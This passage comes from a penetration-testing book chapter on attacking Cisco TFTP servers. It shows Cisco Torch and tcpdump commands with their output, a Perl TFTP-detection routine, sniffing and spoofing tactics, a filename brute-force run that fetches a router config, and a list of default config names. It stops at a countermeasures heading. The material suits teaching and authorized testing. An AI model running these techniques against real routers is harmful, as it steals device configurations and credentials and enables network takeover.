EXPLOITING TFTP SERVERS TO TAKE OVER CISCO HOSTS

Enumerating TFTP Servers

There are known difficulties with enumeration of the UDP-based services. One of the best tools specifically developed to try and solve the banner- grabbing problem is Amap by Van Hauser. However, it does not have the triggers to identify correctly the TFTP service running and reports it as unidentified port. The following example shows Amap output against Cisco 2611 running IOS 12.3(6):

 arhontus / # amap 192.168.66.202 -u 69      amap v4.7 (www.thc.org) started at 2005-03-01 00:19:24 - APPLICATION MAP mode      Unidentified ports: 192.168.66.202:69/udp (total 1).      amap v4.7 finished at 2005-03-01 00:19:30 

The older Cisco implementations of the TFTP server reply to any garbage sent to the port with OpCode "05" (error) and Error Code "0" (not defined see error message). The actual error message differs , because IOS 10/11 contains Error Message "Illegal operation," while Cisco Windows TFTP server replies with "Illegal TFTP operation".

The newer implementations, such as 12.x IOS, simply ignore improperly constructed TFTP requests , thus presenting a more challenging target.

You can obviously try connecting with a standard TFTP client, but to accommodate lazy human nature, we have automated and added this functionality in our favorite Cisco Torch. It sends out a properly constructed TFTP read request to a UDP port and will await for the OpCode 05 with ErrorCode "1" (file not found) to identify the running TFTP service:

 ###############################################################      #   Cisco Torch Mass Scanner                                  #      #   Because we need it...                                     #      #   http://www.arhont.com/index-5.html                        #      ###############################################################      List of targets contains 1 host(s)      16726:  Checking 192.168.20.30 ...      *** Found  TFTP server      --->      - All scans done. Cisco Torch Mass Scanner  -      ---> Exiting. 

Alternatively, you can employ a sample piece of Perl code that will do the same job in your own script:

 sub tftp_installed {      my $port = 69;   # TFTP port        my $retries=2;  # Retries       my $timeout=2; # UDP receiving Timeout 2 sec        my $file="Rand0mSTRING";       my $MAXLEN=2;  # Receive max length        my $op=01; # TFT opcode       my $mode = "netascii"; # TFT mode       my $pkt  = pack("n a* c a* c", $op, $file, 0, $mode, 0); # Build #TFTP "RRQ"packet       while ( $retries != 0) {                   my $sock = IO::Socket::INET->new(Proto => 'udp');                      # Open UDP socket            undef($treturn);                   undef ($rpkt);                    # Send TFTP "RRQ" read request                   send($sock,$pkt,0,pack_sockaddr_in($port,inet_aton($target)));              eval {          local $SIG{ALRM} = \&timed_out; # Handle timed out          alarm $timeout;            $sock->recv($rpkt, $MAXLEN); # Receive          close $sock;          alarm 0;      }  ;          $retries--;      @rets = split( //, $rpkt );      foreach $currentret (@rets) { $treturn .= ord($currentret); }            if ($treturn == "05" ) # If first 2 bytes Error opcode                                   # TFTP found                       {                      log_print("*** Found  TFTP server  \n", "c");                      return (1);                  }       }      } 

Sniffing Out Cisco Configuration Files

Which possibilities are available? First of all, you can sniff out the config name if you are on the same network segment (ARP spoofing, switch CAM table flooding, wireless). Expanding the previous example of the Cisco devices grabbing the files from the TFTP server, you can even get the config "by accident " via broadcast traffic. An "idiot-proof" mechanism is built into the IOS, so if the administrator forgot to specify the address of the TFTP server explicitly, a router would obtain the IP address through BOOTP/DHCP and send the request for the config file to the broadcast address of the network to the UDP port 69, awaiting response from one of the servers ready to fulfill the request. You could simply wait with a tcpdump running until such event occurs or trigger it by launching a DoS attack against a router. The name of the file will be shown in the upcoming request:

 arhontus / # tcpdump -n -i eth0 port 69      23:39:34.142149 IP 192.168.30.25.34098 > 192.168.30.255.69: 25 RRQ       "2611b-config" netascii 

Providing that a sloppy administrator forgot to specify the name of the config file, a router would send requests to the network broadcast address querying the default config names , one after another. What stops you from pretending to be the legit TFTP server and serving the request before the legitimate server does?

Bruteforcing TFTP Servers to Snatch Configs

If the waiting option is not the one to consider, and you don't care about staying stealthy and the possibility of leaving huge log files, you can revert to an active attack through bruteforcing the TFTP server for correct filenames. You know what type of files you are after and you also know the default names for these files as used by Cisco devices. The dictionary attack functionality against the TFTP server is also included in Cisco Torch. The default names for Cisco config files are already saved in the brutefile.txt , but you can generate more and add them if you want.

Run Cisco Torch and wait for it to go through the dictionary file. When the filename is found, the config will be automatically fetched and placed into the directory from which the tool was launched:

 arhontus / # perl cisco-torch.pl -g -j -b 192.168.30.20      <snip>      ###############################################################      #   Cisco Torch Mass Scanner                                  #      #   Because we need it...                                     #      #   http://www.arhont.com/index-5.html                        #      ###############################################################      List of targets contains 1 host(s)      17470:  Checking 192.168.30.20 ...      *** Found  TFTP server      *** Found  TFTP server remote filename : cisco-config      *** Fetch  TFTP remote file : cisco-config      ***Local file :192.168.30.20.cisco-config  download complete      --->      - All scans done. Cisco Torch Mass Scanner  -      ---> Exiting 

If you want to go through a large list of default names, check out another tool written during the process of compiling this chapter, tftp-brute.pl ( http://www.arhont.com/index-5.html at the moment), which runs a large number of parallel processes and does the job faster.

The most common Cisco router default config names are as follows :

 cisconet.cfg      router.cfg       ciscortr.cfg       ifIndex-table      router-config     startup-config   private-config     persistent-data 

Countermeasures Against TFTP- Related Attacks